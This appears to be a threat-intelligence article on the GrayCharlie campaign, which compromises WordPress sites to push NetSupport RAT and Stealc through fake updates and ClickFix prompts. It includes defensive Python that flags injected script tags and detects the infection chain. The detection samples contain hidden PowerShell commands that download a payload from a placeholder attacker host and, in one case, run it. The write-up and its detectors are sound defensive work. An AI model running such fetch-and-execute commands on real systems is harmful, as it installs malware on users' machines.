GrayCharlie Exploits WordPress Sites to Deploy NetSupport RAT and Stealc Malware
A threat actor tracked as GrayCharlie has been compromising WordPress websites since mid-2023 and injecting malicious JavaScript into them to push malware to the sites' visitors. GrayCharlie is associated with the previously tracked SmartApeSG cluster, also known as ZPHP or HANEMONEY.
Primary Malware Deployed:
– NetSupport RAT: A legitimate remote-administration product (NetSupport Manager) abused as a remote access trojan; once installed it gives the operator interactive control of the infected system.
– Stealc: An information stealer that harvests credentials, cookies and other sensitive data from the compromised machine.
– SectopRAT: A more recently observed addition to the toolset, delivered as a secondary payload to hosts already running NetSupport RAT.
Infection Mechanism:
GrayCharlie employs a methodical approach to infect systems:
1. JavaScript Injection: The group inserts a script tag into the Document Object Model (DOM) of legitimate but compromised WordPress sites. The tag references an external JavaScript file hosted on attacker-controlled servers, so the injected markup on the victim site stays small and the payload can be changed server-side at will.
2. User Profiling: When a visitor loads the infected page, the external script fingerprints the browser and operating system and uses the result to select the next stage.
3. Deceptive Prompts: Based on the profiling, victims are presented with either:
– Fake Browser Updates: Convincing prompts urging the user to download and run a browser "update".
– ClickFix-Style Fake CAPTCHAs: Fake verification pages that instruct the user to copy a command and run it themselves, so that the victim, not a browser exploit, executes the malicious code.
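The first stage above is a foreign script tag in otherwise legitimate WordPress HTML. The following script, an added example written for this article and not code from GrayCharlie or from any WordPress tool, parses page HTML, lists every host that scripts are loaded from, flags hosts that are neither the site itself nor on an allowlist, and then groups sites by the unexpected host they share, which is how a cluster like the fifteen law-firm sites pointing at one domain would surface. All sample pages and hostnames (including cdn.example-attacker.test) are constructed for illustration and are not indicators from the report.

```python
"""Flag externally hosted <script src> tags outside an allowlist.

Added example for this article, not GrayCharlie's code nor any WordPress
tool. The HTML samples and hostnames below are constructed; the host
cdn.example-attacker.test stands in for an attacker-controlled server.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag != "script":
            return
        for name, value in attrs:
            if name == "src" and value:
                self.srcs.append(value.strip())


def script_hosts(html, page_host):
    """Return the set of hostnames the page loads scripts from.

    Relative paths count as the page's own host; protocol-relative
    references (//host/x.js) are resolved before parsing.
    """
    parser = ScriptSrcCollector()
    parser.feed(html)
    hosts = set()
    for src in parser.srcs:
        if src.startswith("//"):
            src = "https:" + src
        host = urlparse(src).hostname
        hosts.add(host.lower() if host else page_host.lower())
    return hosts


def unexpected_script_hosts(html, page_host, allowlist):
    """Hosts that are neither the page's own host nor explicitly allowed."""
    allowed = {page_host.lower()} | {h.lower() for h in allowlist}
    return {h for h in script_hosts(html, page_host) if h not in allowed}


def shared_injections(pages, allowlist):
    """Map each unexpected script host to the sites (more than one) that
    load from it: identical injections across sites are the cluster signal."""
    by_host = {}
    for page_host, html in pages.items():
        for h in unexpected_script_hosts(html, page_host, allowlist):
            by_host.setdefault(h, set()).add(page_host)
    return {h: sorted(sites) for h, sites in by_host.items() if len(sites) > 1}


# Constructed sample pages (not real sites): two carry the same injected
# tag, one is clean. Note the upper-case tag and protocol-relative src.
SAMPLE_PAGES = {
    "firm-a.example": """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://www.googletagmanager.com/gtag/js?id=G-XXXX"></script>
<script src="//cdn.example-attacker.test/loader.js"></script>
</head><body></body></html>""",
    "firm-b.example": """<html><head>
<SCRIPT SRC="https://cdn.example-attacker.test/loader.js"></SCRIPT>
<script src="https://firm-b.example/wp-content/themes/x/app.js"></script>
</head><body></body></html>""",
    "clean.example": """<html><head>
<script src="https://clean.example/wp-includes/js/wp-embed.min.js"></script>
</head><body></body></html>""",
}
ALLOWLIST = ["www.googletagmanager.com"]  # assumed per-site allowlist

if __name__ == "__main__":
    for host, html in SAMPLE_PAGES.items():
        print(host, sorted(unexpected_script_hosts(html, host, ALLOWLIST)))
    print(shared_injections(SAMPLE_PAGES, ALLOWLIST))
```

Run this against HTML fetched from your own sites (with a browser-like User-Agent, since such injections are sometimes served conditionally). It only sees static script tags; a script element appended at runtime by an inline script will not appear, so also diff inline script blocks and theme/plugin files against a known-good copy.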
Infrastructure and Operations:
Analysts have traced GrayCharlie’s backend infrastructure primarily to hosting services like MivoCloud and HZ Hosting Ltd. The group manages multiple clusters of NetSupport RAT command-and-control (C2) servers, each characterized by unique TLS certificate naming patterns, license keys, and serial numbers. These servers have been systematically deployed throughout 2025.
To maintain a low profile, GrayCharlie administers C2 servers over TCP port 443 and utilizes SSH for managing staging servers, making their traffic blend seamlessly with legitimate activities. Observations suggest that some members of GrayCharlie are Russian-speaking, based on browsing patterns from higher-tier infrastructure.
Targeted Industries and Regions:
GrayCharlie’s attacks are widespread, affecting various industries globally. However, the United States has been a primary target. Notably, at least fifteen U.S. law firm websites were found to have identical malicious JavaScript injections pointing to the same attacker domain.
Investigations indicate that these law firms were compromised through a supply-chain attack involving SMB Team, an IT services company catering to numerous law firms across North America. Stolen credentials associated with an SMB Team email address were discovered around the time the malicious domain became active.
Detailed Infection Process:
Once a victim interacts with the deceptive prompts:
1. Execution of Malicious Script: In the fake-update path, the downloaded "update" is a script that runs under WScript, which in turn launches PowerShell.
2. Malware Deployment: PowerShell downloads an archive and extracts the full NetSupport RAT client into the user's AppData folder, a location writable without administrative rights.
3. ClickFix Variant and Persistence: In the ClickFix path, the user is tricked into pasting an attacker-supplied command that retrieves a batch file; the batch file installs the RAT and creates a Registry Run key so the client starts at every logon.
4. Secondary Payloads: Operators then connect through the C2 servers, perform system reconnaissance, and deploy additional malware such as SectopRAT or Stealc on hosts they judge worthwhile.
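The four steps above give a host-side detection chain: a script host spawning PowerShell, PowerShell downloading into AppData, a command pasted by the user that fetches a file, and a Run key pointing into AppData. The following block, an added example for this article and not a rule from the report, encodes that chain as checks over events shaped like Sysmon Event ID 1 (process creation: Image, ParentImage, CommandLine) and Event ID 13 (registry value set: TargetObject, Details). Every path, hostname and file name in the sample events is constructed; the download cmdlets matched and the assumption that a ClickFix command arrives with explorer.exe as parent are the author's, since the article only says that PowerShell "downloads and extracts" the client and that the user pastes a command.

```python
"""Detection logic for the WScript -> PowerShell -> AppData -> Run-key chain.

Added example for this article, not a rule from the referenced report. The
events are constructed in the shape of Sysmon Event ID 1 (process create)
and Event ID 13 (registry value set); paths, hosts and names are made up.
"""
import re
from ntpath import basename

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Run keys under HKCU/HKU (per-user persistence, no admin rights needed).
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
# AppData as a literal path or via the environment variable.
APPDATA_RE = re.compile(
    r"\\AppData\\(Roaming|Local)\\|\$env:(APPDATA|LOCALAPPDATA)\b", re.I)
# Download/extract primitives; assumed, the article names no cmdlet.
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Expand-Archive|\bcurl\b",
    re.I)


def _name(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return basename(path or "").lower()


def detect(events):
    """Return (rule, event) pairs for every event that matches a stage."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 1:
            parent = _name(e.get("ParentImage"))
            image = _name(e.get("Image"))
            cmd = e.get("CommandLine", "")
            if parent in SCRIPT_HOSTS and image in POWERSHELL:
                findings.append(("script_host_spawned_powershell", e))
            if image in POWERSHELL and CRADLE_RE.search(cmd) and APPDATA_RE.search(cmd):
                findings.append(("powershell_download_to_appdata", e))
            # ClickFix: the user runs the command, so the parent is the
            # desktop shell. explorer.exe as parent is an assumption here.
            if (parent == "explorer.exe"
                    and image in POWERSHELL | {"cmd.exe", "mshta.exe"}
                    and CRADLE_RE.search(cmd)):
                findings.append(("user_pasted_download_command", e))
        elif eid == 13:
            if (RUN_KEY_RE.search(e.get("TargetObject", ""))
                    and APPDATA_RE.search(e.get("Details", ""))):
                findings.append(("run_key_points_to_appdata", e))
    return findings


def rules_hit(events):
    """Distinct rule names fired by a batch of events, sorted."""
    return sorted({rule for rule, _ in detect(events)})


# Constructed sample events: three malicious, two benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://update.example-attacker.test/u.zip -OutFile $env:APPDATA\u.zip; Expand-Archive $env:APPDATA\u.zip $env:APPDATA\svc"'},
    {"EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "Invoke-WebRequest http://update.example-attacker.test/r.bat -OutFile $env:TEMP\r.bat; & $env:TEMP\r.bat"'},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\SystemHost",
     "Details": r"C:\Users\jdoe\AppData\Roaming\svc\host.exe"},
    # Benign: an interactive PowerShell with no download, and a vendor Run key.
    {"EventID": 1,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]

if __name__ == "__main__":
    for rule, event in detect(SAMPLE_EVENTS):
        print(rule, "<-", event.get("CommandLine") or event.get("Details"))
```

Each check maps directly onto a Sigma rule (process_creation and registry_set log sources); the value of keeping them separate is that a single host hitting two or more of them within minutes is a far stronger signal than any one alone, and the Run-key check catches the ClickFix path even when the pasted command itself was not logged.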
Recommendations for Mitigation:
To defend against this campaign, organizations should:
– Block Known Malicious IPs and Domains: Implement network-level blocks for the published GrayCharlie infrastructure, bearing in mind that the group rotates staging and C2 servers, so indicator blocks are a floor rather than a complete defense.
– Deploy Detection Rules: Use Sigma rules for the process chain described above (a script host spawning PowerShell, downloads into AppData, Run keys pointing into AppData), Snort rules for the NetSupport C2 traffic, and YARA rules for the dropped client files, and respond to hits promptly.
– Regularly Update and Patch Systems: Keep WordPress core, themes and plugins current to reduce the attack surface of the sites themselves. Note that the law-firm sites described here were reached through stolen IT-provider credentials, so patching must be paired with multi-factor authentication on hosting and WordPress admin accounts and with credential rotation whenever a provider is compromised.
– Educate Users: Train staff to recognize fake browser-update prompts and fake CAPTCHA pages; no legitimate update or verification page asks the user to paste a command into a terminal or the Run dialog, and that request alone should be treated as a red flag.
Conclusion:
GrayCharlie’s campaign underscores how compromised instances of widely used platforms like WordPress are turned into malware distribution points, and how a single IT provider’s credentials can expose every site it manages. By understanding these tactics and implementing the detections and controls above, organizations can better protect both their own sites and the people who visit them.